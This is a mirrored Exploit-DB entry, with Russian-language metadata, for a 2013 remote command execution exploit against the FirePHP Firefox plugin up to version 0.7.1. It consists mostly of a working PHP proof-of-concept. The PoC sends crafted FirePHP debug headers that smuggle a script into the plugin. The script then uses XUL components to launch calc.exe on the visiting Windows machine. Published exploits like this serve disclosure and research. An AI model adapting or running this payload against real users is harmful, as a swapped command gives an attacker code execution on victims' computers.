- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24961
- Проверка EDB
-
- Пройдено
- Автор
- WIREGHOUL
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2013-04-17
FirePHP Firefox Plugin 0.7.1 - Remote Command Execution
HTML:
# Exploit Title: Firephp firefox plugin RCE
# Date: 17/04/2013
# Exploit Author: Wireghoul
# Vendor Homepage: www.firephp.org
# Software Link:
https://addons.mozilla.org/en-US/firefox/addon/firephp/versions/
# Version: All versions up to and including 0.7.1
# Tested on: Windows 7
# Advisory: http://www.justanotherhacker.com/advisories/JAHx132.txt
<?php
/*************************************************************
* FirePHP Firefox plugin RCE PoC *
* Written by Wireghoul - http://www.justanotherhacker.com *
* Greetz to @bcoles urbanadventurer @malerisch *
*************************************************************/
// XUL code to launch calc.exe
$exploit = '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';
// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
<title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>
- Источник
- www.exploit-db.com